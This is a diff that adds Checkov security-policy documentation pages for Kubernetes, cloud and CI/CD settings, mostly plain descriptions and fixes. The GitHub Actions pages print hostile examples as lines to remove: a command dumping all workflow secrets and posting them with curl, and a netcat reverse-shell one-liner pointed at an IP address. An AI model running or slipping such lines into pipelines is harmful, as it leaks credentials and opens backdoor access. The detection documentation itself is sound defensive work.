ensure-that-the-kubelet-client-certificate-and-kubelet-client-key-arguments-are-set-as-appropriate.adoc + - name: The --kubelet-https argument is not set to True + file: ensure-that-the-kubelet-https-argument-is-set-to-true.adoc + - name: Kubelet does not use strong cryptographic ciphers + file: ensure-that-the-kubelet-only-makes-use-of-strong-cryptographic-ciphers.adoc + - name: The --make-iptables-util-chains argument is not set to True + file: ensure-that-the-make-iptables-util-chains-argument-is-set-to-true.adoc + - name: The --peer-cert-file and --peer-key-file arguments are not set appropriately + file: ensure-that-the-peer-cert-file-and-peer-key-file-arguments-are-set-as-appropriate.adoc + - name: The --peer-client-cert-auth argument is not set to True + file: ensure-that-the-peer-client-cert-auth-argument-is-set-to-true.adoc + - name: The --profiling argument is not set to False for scheduler + file: ensure-that-the-profiling-argument-is-set-to-false-1.adoc + - name: The --profiling argument is not set to false for API server + file: ensure-that-the-profiling-argument-is-set-to-false-2.adoc + - name: The --profiling argument for controller managers is not set to False + file: ensure-that-the-profiling-argument-is-set-to-false.adoc + - name: The --protect-kernel-defaults argument is not set to True + file: ensure-that-the-protect-kernel-defaults-argument-is-set-to-true.adoc + - name: The --read-only-port argument is not set to 0 + file: ensure-that-the-read-only-port-argument-is-set-to-0.adoc + - name: The --request-timeout argument is not set appropriately + file: ensure-that-the-request-timeout-argument-is-set-as-appropriate.adoc + - name: The --root-ca-file argument for controller managers is not set appropriately + file: ensure-that-the-root-ca-file-argument-is-set-as-appropriate.adoc + - name: The --rotate-certificates argument is set to false + file: ensure-that-the-rotate-certificates-argument-is-not-set-to-false.adoc + - name: The RotateKubeletServerCertificate argument for controller managers is not set to True + file: ensure-that-the-rotatekubeletservercertificate-argument-is-set-to-true-for-controller-manager.adoc + - name: The --secure-port argument is set to 0 + file: ensure-that-the-secure-port-argument-is-not-set-to-0.adoc + - name: The --service-account-key-file argument is not set appropriately + file: ensure-that-the-service-account-key-file-argument-is-set-as-appropriate.adoc + - name: The --service-account-lookup argument is not set to true + file: ensure-that-the-service-account-lookup-argument-is-set-to-true.adoc + - name: The --service-account-private-key-file argument for controller managers is not set appropriately + file: ensure-that-the-service-account-private-key-file-argument-is-set-as-appropriate.adoc + - name: The --streaming-connection-idle-timeout argument is set to 0 + file: ensure-that-the-streaming-connection-idle-timeout-argument-is-not-set-to-0.adoc + - name: The --terminated-pod-gc-threshold argument for controller managers is not set appropriately + file: ensure-that-the-terminated-pod-gc-threshold-argument-is-set-as-appropriate.adoc + - name: The --tls-cert-file and --tls-private-key-file arguments for Kubelet are not set appropriately + file: ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate-for-kubelet.adoc + - name: The --tls-cert-file and --tls-private-key-file arguments for API server are not set appropriately + file: ensure-that-the-tls-cert-file-and-tls-private-key-file-arguments-are-set-as-appropriate.adoc + - name: The --token-auth-file argument is Set + file: ensure-that-the-token-auth-file-parameter-is-not-set.adoc + - name: The --use-service-account-credentials argument for controller managers is not set to True + file: ensure-that-the-use-service-account-credentials-argument-is-set-to-true.adoc + - name: Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation + file: granting-create-permissions-to-nodesproxy-or-podsexec-sub-resources-allows-potential-privilege-escalation.adoc + - name: Admission of containers with capabilities assigned is not minimised + file: minimize-the-admission-of-containers-with-capabilities-assigned.adoc + - name: No ServiceAccount/Node should be able to read all secrets + file: no-serviceaccountnode-should-be-able-to-read-all-secrets.adoc + - name: No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts + file: no-serviceaccountnode-should-have-impersonate-permissions-for-groupsusersservice-accounts.adoc + - name: NGINX Ingress has annotation snippets + file: prevent-all-nginx-ingress-annotation-snippets.adoc + - name: NGINX Ingress has annotation snippets which contain alias statements + file: prevent-nginx-ingress-annotation-snippets-which-contain-alias-statements.adoc + - name: NGINX Ingress annotation snippets contains LUA code execution + file: prevent-nginx-ingress-annotation-snippets-which-contain-lua-code-execution.adoc + - name: RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding + file: rolebinding-should-not-allow-privilege-escalation-to-a-serviceaccount-or-node-on-other-rolebinding.adoc + - name: ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster + file: serviceaccounts-and-nodes-potentially-exposed-to-cve-2020-8554.adoc +--- +kind: chapter +name: OCI Policies +dir: oci-policies +topics: +- name: OCI Policies + file: oci-policies.adoc +- name: Compute + dir: compute + topics: + - name: Compute + file: compute.adoc + - name: OCI Compute Instance boot volume has in-transit data encryption is disabled + file: ensure-oci-compute-instance-boot-volume-has-in-transit-data-encryption-enabled.adoc + - name: OCI Compute Instance has Legacy MetaData service endpoint enabled + file: ensure-oci-compute-instance-has-legacy-metadata-service-endpoint-disabled.adoc +- name: IAM + dir: iam + topics: + - name: IAM + file: iam.adoc + - name: OCI IAM password policy for local (non-federated) users does not have minimum 14 characters + file: oci-iam-password-policy-for-local-non-federated-users-has-a-minimum-length-of-14-characters.adoc + - name: OCI IAM password policy for local (non-federated) users does not have a lowercase character + file: oci-iam-password-policy-must-contain-lower-case.adoc + - name: OCI IAM password policy for local (non-federated) users does not have a number + file: oci-iam-password-policy-must-contain-numeric-characters.adoc + - name: OCI IAM password policy for local (non-federated) users does not have a symbol + file: oci-iam-password-policy-must-contain-special-characters.adoc + - name: OCI IAM password policy for local (non-federated) users does not have an uppercase character + file: oci-iam-password-policy-must-contain-uppercase-characters.adoc +- name: Logging + dir: logging + topics: + - name: Logging + file: logging.adoc + - name: OCI Compute Instance has monitoring disabled + file: ensure-oci-compute-instance-has-monitoring-enabled.adoc +- name: Networking + dir: networking + topics: + - name: Networking + file: networking.adoc + - name: OCI Network Security Groups (NSG) has stateful security rules + file: ensure-oci-security-group-has-stateless-ingress-security-rules.adoc + - name: OCI security groups rules allows ingress from 0.0.0.0/0 to port 22 + file: ensure-oci-security-groups-rules-do-not-allow-ingress-from-00000-to-port-22.adoc + - name: OCI Security Lists with Unrestricted traffic to port 22 + file: ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-22.adoc + - name: OCI security list allows ingress from 0.0.0.0/0 to port 3389 + file: ensure-oci-security-list-does-not-allow-ingress-from-00000-to-port-3389.adoc + - name: OCI VCN has no inbound security list + file: ensure-vcn-has-an-inbound-security-list.adoc + - name: OCI VCN Security list has stateful security rules + file: ensure-vcn-inbound-security-lists-are-stateless.adoc +- name: Secrets 1 + dir: secrets-1 + topics: + - name: Secrets 1 + file: secrets-1.adoc + - name: OCI private keys are hard coded in the provider + file: bc-oci-secrets-1.adoc +- name: Storage + dir: storage + topics: + - name: Storage + file: storage.adoc + - name: OCI Block Storage Block Volume does not have backup enabled + file: ensure-oci-block-storage-block-volume-has-backup-enabled.adoc + - name: OCI File Storage File Systems are not encrypted with a Customer Managed Key (CMK) + file: ensure-oci-file-system-is-encrypted-with-a-customer-managed-key.adoc + - name: OCI Object Storage bucket does not emit object events + file: ensure-oci-object-storage-bucket-can-emit-object-events.adoc + - name: OCI Object Storage Bucket has object Versioning disabled + file: ensure-oci-object-storage-has-versioning-enabled.adoc + - name: OCI Object Storage Bucket is not encrypted with a Customer Managed Key (CMK) + file: ensure-oci-object-storage-is-encrypted-with-customer-managed-key.adoc + - name: OCI Object Storage bucket is publicly accessible + file: ensure-oci-object-storage-is-not-public.adoc + - name: OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) + file: oci-block-storage-block-volumes-are-not-encrypted-with-a-customer-managed-key-cmk.adoc +--- +kind: chapter +name: OpenStack Policies +dir: openstack-policies +topics: +- name: OpenStack Policies + file: openstack-policies.adoc +- name: OpenStack Policy Index + dir: openstack-policy-index + topics: + - name: OpenStack Policy Index + file: openstack-policy-index.adoc + - name: OpenStack Security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) + file: bc-openstack-networking-2.adoc + - name: OpenStack firewall rule does not have destination IP configured + file: ensure-openstack-firewall-rule-has-destination-ip-configured.adoc + - name: OpenStack instance use basic credentials + file: ensure-openstack-instance-does-not-use-basic-credentials.adoc diff --git a/code-security/policy-reference/build-integrity-policies/bitbucket-policies/bitbucket-policies.adoc b/code-security/policy-reference/build-integrity-policies/bitbucket-policies/bitbucket-policies.adoc new file mode 100644 index 000000000..436263749 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/bitbucket-policies/bitbucket-policies.adoc @@ -0,0 +1,14 @@ +== Bitbucket Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:merge-requests-should-require-at-least-2-approvals-1.adoc[BitBucket pull requests require less than approvals] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/bitbucket/checks/merge_requests_approvals.py[CKV_BITBUCKET_1] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/build-integrity-policies/bitbucket-policies/merge-requests-should-require-at-least-2-approvals-1.adoc b/code-security/policy-reference/build-integrity-policies/bitbucket-policies/merge-requests-should-require-at-least-2-approvals-1.adoc new file mode 100644 index 000000000..834581b31 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/bitbucket-policies/merge-requests-should-require-at-least-2-approvals-1.adoc @@ -0,0 +1,52 @@ +== BitBucket pull requests require less than approvals +// Bitbucket pull requests require minimum number of approvals + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4fb83a3a-d3ef-43f2-8e11-4feb2a21fd91 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/bitbucket/checks/merge_requests_approvals.py[CKV_BITBUCKET_1] + +|Severity +|MEDIUM + +|Subtype +|Build +// ,Run + +|Frameworks +|VCS + +|=== + + + +=== Description + + +In Bitbucket, repository administrators can require that all pull requests receive a specific number of approving reviews before someone merges the pull request into a protected branch. +If a collaborator attempts to merge a pull request with pending or rejected reviews into the protected branch, the collaborator will receive an error message. + +//// +=== Fix - Runtime + +. Login to Bitbucket + +. Select your repository + +. Select Repository settings + +. Select Branch restrictions + +. Add a restriction + +. Under Merge settings check Minimum number of approvals and select 2 + +. Save +//// \ No newline at end of file diff --git a/code-security/policy-reference/build-integrity-policies/build-integrity-policies.adoc b/code-security/policy-reference/build-integrity-policies/build-integrity-policies.adoc new file mode 100644 index 000000000..ac74bcaaa --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/build-integrity-policies.adoc @@ -0,0 +1,3 @@ +== Build Integrity Policies + + diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-actions-allow-unsecure-commands-isnt-true-on-environment-variables.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-actions-allow-unsecure-commands-isnt-true-on-environment-variables.adoc new file mode 100644 index 000000000..9304bb737 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-actions-allow-unsecure-commands-isnt-true-on-environment-variables.adoc @@ -0,0 +1,49 @@ +== GitHub Actions ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable is set to true +// GitHub Actions ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable set to true + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5f535c28-9737-46eb-b505-0471b746c202 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py[CKV_GHA_1] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|GithubAction + +|=== + + + +=== Description + + +GitHub Actions (GHA) environment variable flag `ACTIONS_ALLOW_UNSECURE_COMMANDS` allows GHA workflows to run the `set-env` and `add-path`deprecated commands which should not be used as they expose accounts to potential credential theft or code injection. + +=== Fix - Buildtime + + +*GitHub Actions* + + +Remove `ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true'` + +[source,yaml] +---- +... + env: +- ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true' +... +---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-run-commands-are-not-vulnerable-to-shell-injection.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-run-commands-are-not-vulnerable-to-shell-injection.adoc new file mode 100644 index 000000000..69d945f1d --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/ensure-run-commands-are-not-vulnerable-to-shell-injection.adoc @@ -0,0 +1,65 @@ +== GitHub Actions Run commands are vulnerable to shell injection + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 88bfe6da-4117-4fa0-b542-a450bfc70ebd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/ShellInjection.py[CKV_GHA_2] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|GithubActions + +|=== + +=== Description + + + +You should avoid any API calls that include processing the following as input. +https://securitylab.github.com/research/github-actions-untrusted-input/[Source] + +Potentially risky variables include: + +* github.event.issue.title +* github.event.issue.body +* github.event.pull_request.title +* github.event.pull_request.body +* github.event.comment.body +* github.event.review.body +* github.event.review_comment.body +* github.event.pages.*.page_name +* github.event.commits.*.message +* github.event.head_commit.message +* github.event.head_commit.author.email +* github.event.head_commit.author.name +* github.event.commits.*.author.email +* github.event.commits.*.author.name +* github.event.pull_request.head.ref +* github.event.pull_request.head.label +* github.event.pull_request.head.repo.default_branch +* github.head_ref + +=== Fix - Buildtime + + +*GitHub Actions yaml* + + +[source,yaml] +---- +- title="${{ github.event.issue.title }}" +---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/found-artifact-build-without-evidence-of-cosign-sbom-attestation-in-pipeline.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/found-artifact-build-without-evidence-of-cosign-sbom-attestation-in-pipeline.adoc new file mode 100644 index 000000000..c4cae25f8 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/found-artifact-build-without-evidence-of-cosign-sbom-attestation-in-pipeline.adoc @@ -0,0 +1,51 @@ +== GitHub Actions artifact build do not have SBOM attestation in pipeline +// GitHub Actions artifact build does not include SBOM attestation in pipeline + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2e1596ff-56b2-4dde-94fb-60d697500b74 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/CosignSBOM.py[CKV_GHA_6] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Github Actions + +|=== + +=== Description + +Signing SBOMs ensures that no changes were made to an application between the code and deploy phases. Cosign can be used to sign pipeline artifacts to ensure their integrity and prevent tampering prior to and after deployment. + + +=== Fix - Buildtime + +*Example Fix Add `cosign sign` to sign SBOMs.* + + +There are many ways to do this as a job or step in a GitHub Actions pipeline. +Below is one example for signing an SBOM. + +[source,yaml] +---- ++ run: cosign attest --predicate sbom.json --type https://cyclonedx.org/bom --key env://COSIGN_PRIVATE_KEY ${{ env.IMAGE }} +---- + +OR + +[source,yaml] +---- ++ run: cosign sign --key cosign.key container:sha256-1234.sbom +---- \ No newline at end of file diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-contain-workflow-dispatch-input-parameters.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-contain-workflow-dispatch-input-parameters.adoc new file mode 100644 index 000000000..18784d773 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-contain-workflow-dispatch-input-parameters.adoc @@ -0,0 +1,44 @@ +== GitHub Actions contain workflow_dispatch inputs parameters +// GitHub Actions contain 'workflow_dispatch' input parameters + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 23d12d24-8e7d-4718-8d34-084429ae7077 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py[CKV_GHA_7] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GithubAction + +|=== + +=== Description +In GitHub Actions, workflow_dispatch allows you to manually trigger pipelines and enter unique inputs for each run. +While this may be helpful for running different scenarios, it breaks the policy that workflows should be automated and not take user input. + +=== Fix - Buildtime +*Example Fix* + + +[source,yaml] +---- +on: +workflow_dispatch: +- inputs: +- ... +---- +---- +---- diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-policies.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-policies.adoc new file mode 100644 index 000000000..ea98a8418 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/github-actions-policies.adoc @@ -0,0 +1,44 @@ +== Github Actions Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-actions-allow-unsecure-commands-isnt-true-on-environment-variables.adoc[GitHub Actions ACTIONS_ALLOW_UNSECURE_COMMANDS environment variable is set to true] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/AllowUnsecureCommandsOnJob.py[CKV_GHA_1] +|MEDIUM + + +|xref:ensure-run-commands-are-not-vulnerable-to-shell-injection.adoc[GitHub Actions Run commands are vulnerable to shell injection] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/ShellInjection.py[CKV_GHA_2] +|MEDIUM + + +|xref:found-artifact-build-without-evidence-of-cosign-sbom-attestation-in-pipeline.adoc[GitHub Actions artifact build do not have SBOM attestation in pipeline] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/CosignSBOM.py[CKV_GHA_6] +|LOW + + +|xref:no-evidence-of-signing.adoc[GitHub Actions artifact build do not have cosign - sign execution in pipeline] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/CosignArtifacts.py[CKV_GHA_5] +|LOW + + +|xref:suspicious-use-of-curl-with-secrets.adoc[GitHub Actions curl is being with secrets] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/SuspectCurlInScript.py[CKV_GHA_3] +|LOW + + +|xref:suspicious-use-of-netcat-with-ip-address.adoc[GitHub Actions Netcat is being used with IP address] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/ReverseShellNetcat.py[CKV_GHA_4] +|LOW + + +|xref:the-build-output-cannot-be-affected-by-user-parameters-other-than-the-build-entry-point-and-the-top-level-source-location-github-actions-workflow-dispatch-inputs-must-be-empty.adoc[GitHub Actions contain workflow_dispatch inputs parameters] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/EmptyWorkflowDispatch.py[CKV_GHA_7] +|LOW + + +|=== + diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/no-evidence-of-signing.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/no-evidence-of-signing.adoc new file mode 100644 index 000000000..8aa490bbe --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/no-evidence-of-signing.adoc @@ -0,0 +1,43 @@ +== GitHub Actions artifact build do not have cosign - sign execution in pipeline +// GitHub Actions artifact build does not use 'cosign' to sign pipeline artifacts + +Cosign can be used to sign pipeline artifacts, such as container images, to ensure their integrity and prevent tampering prior to and after deployment. +Violating this policy means a signable artifact was discovered but there is no evidence of signing that artifact in your pipeline. + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3281171a-ff12-4591-a28d-51d888aa58c7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/CosignArtifacts.py[CKV_GHA_5] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GithubAction + +|=== + +=== Description +Cosign can be used to sign pipeline artifacts, such as container images, to ensure their integrity and prevent tampering prior to and after deployment. +Violating this policy means a signable artifact was discovered but there is no evidence of signing that artifact in your pipeline. + +=== Fix - Buildtime +*Example Fix Add `cosign sign` to sign artifacts.* + + +There are many ways to do this as a job or step in a GitHub Actions pipeline. +Below is one example for signing a container image. +[source,yaml] +---- +---- +---- +---- diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-curl-with-secrets.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-curl-with-secrets.adoc new file mode 100644 index 000000000..17028d8b1 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-curl-with-secrets.adoc @@ -0,0 +1,44 @@ +== GitHub Actions curl is being with secrets +// GitHub Actions curl includes secrets + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| eee86014-e192-45fd-bcd4-a236421ae7fb + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/SuspectCurlInScript.py[CKV_GHA_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GithubAction + +|=== + +=== Description +If a secret is present in a workflow and a bad actor can modify the GitHub Action, they can send the secret to a website they own via curl. + +=== Fix - Buildtime + + +*GitHub Actions* + + +Block code and remove code that attempts to exfiltrate secrets. + +[source,yaml] +---- + run: | +- echo "${{ toJSON(secrets) }}" > .secrets +- curl -X POST -s --data "@.secrets" /dev/null +---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-netcat-with-ip-address.adoc b/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-netcat-with-ip-address.adoc new file mode 100644 index 000000000..d66da59cd --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-actions-policies/suspicious-use-of-netcat-with-ip-address.adoc @@ -0,0 +1,44 @@ +== GitHub Actions Netcat is being used with IP address +// Suspicious use of netcat with IP address + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d375f163-8b32-4b0c-91a8-baf491c9b6a6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github_actions/checks/job/ReverseShellNetcat.py[CKV_GHA_4] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|GithubAction + +|=== + +=== Description + +Netcat in combination with an IP address can be used to establish a connection to an external computer or server. This can be used to open up backdoor access or exfiltrate data. + +=== Fix - Buildtime + + +*GitHub Actions* + + +Block code and remove code that attempts to make a connection over a network. + +[source,yaml] +---- +- rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f +---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-2-admins-are-set-for-each-repository.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-2-admins-are-set-for-each-repository.adoc new file mode 100644 index 000000000..208d78a8a --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-2-admins-are-set-for-each-repository.adoc @@ -0,0 +1,33 @@ +== GitHub repository has less than 2 admins +// GitHub repository has less than 2 administrators + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 198e1833-37dc-4eee-8c42-e526a3f9dad5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/repository_collaborators.py[CKV_GITHUB_9] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Having two or more admins allows for failover if an admin is busy and for checks between admins. +Ensure you have at least two admins for every repository. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-branch-protection-rules-are-enforced-on-administrators.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-branch-protection-rules-are-enforced-on-administrators.adoc new file mode 100644 index 000000000..ba4b5b404 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-branch-protection-rules-are-enforced-on-administrators.adoc @@ -0,0 +1,37 @@ +== GitHub branch protection rules are not enforced on administrators +// GitHub branch protection rules not enforced on administrators + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 075a8621-891b-478d-98dd-cddd90d035fa + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/enforce_branch_protection_admins.py[CKV_GITHUB_10] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +By default, branch protection rules do not apply to admins, allowing them to potentially bypass many of the implemented safeguards. This makes both the admins and their accounts a greater liability. + +Enforce branch protection rules on admins to ensure safeguards are in place for all users. + + +//image::a07f1a0-Screen_Shot_2022-08-19_at_5.13.12_PM.png diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-actions-secrets-are-encrypted.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-actions-secrets-are-encrypted.adoc new file mode 100644 index 000000000..2becc7912 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-actions-secrets-are-encrypted.adoc @@ -0,0 +1,52 @@ +== GitHub Actions Environment Secrets are not encrypted +// GitHub Actions Environment Secrets not encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5b6b0289-e698-4aa1-9a31-c7e03c6ff016 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/github/SecretsEncrypted.py[CKV_GIT_4] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +In the GitHub Terraform provider, there is an optional field to include a plaintext string of the secret. +If this is checked into code, it will expose the secret. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* github_actions_environment_secret, github_actions_organization_secret, github_actions_secret +* *Attribute:* vulnerability_alerts + +[source,hcl] +---- +resource "github_actions_environment_secret" "test_secret" { + +... +- plaintext_value = "example%value" +} +---- + diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-dismisses-stale-review-on-new-commit.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-dismisses-stale-review-on-new-commit.adoc new file mode 100644 index 000000000..c91df2ff1 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-dismisses-stale-review-on-new-commit.adoc @@ -0,0 +1,33 @@ +== GitHub branch protection does not dismiss stale reviews + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ca9f8620-6228-4f95-bbf9-ef1c586cfdaa + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/dismiss_stale_reviews.py[CKV_GITHUB_11] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +By default, PR reviews remain when a new commit is pushed. +However, a commit can bring things out of compliance. +Dismissing reviews after a commit ensures reviews are still relevant. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-codeowner-reviews.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-codeowner-reviews.adoc new file mode 100644 index 000000000..367315e4c --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-codeowner-reviews.adoc @@ -0,0 +1,32 @@ +== GitHub branch protection does not require code owner reviews + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8ea50a5c-58cb-4f0f-b876-d3d61f666e95 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_code_owner_reviews.py[CKV_GITHUB_13] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +Branch protections can require code owner reviews for code changes. +This means that pull requests must have approval from a code owner before merging. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-conversation-resolution.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-conversation-resolution.adoc new file mode 100644 index 000000000..f2c8bfbf6 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-conversation-resolution.adoc @@ -0,0 +1,31 @@ +== GitHub branch protection does not require status checks + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e724920f-a26d-40f2-a64d-5f50cb3167c2" + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_conversation_resolution.py[CKV_GITHUB_16] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +This branch protection rule requires that all comments on a pull request are addressed or acknowledged, ensuring that all reviewers' concerns are reviewed. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-push-restrictions.adoc b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-push-restrictions.adoc new file mode 100644 index 000000000..887f026c6 --- /dev/null +++ b/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-push-restrictions.adoc @@ -0,0 +1,32 @@ +== GitHub branch protection does not require push restrictions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 877ba140-6c1c-406f-970f-57ce75464559 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/github/checks/require_push_restrictions.py[CKV_GITHUB_17] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|VCS + +|=== + + + +=== Description + + +This branch protection rule ensures that only specific users are able to merge code to a repository. +This prevents code from bypassing checks and being merged without proper review. diff --git a/code-security/policy-reference/build-integrity-policies/github-policies/ensure-github-branch-protection-requires-status-checks.adoc 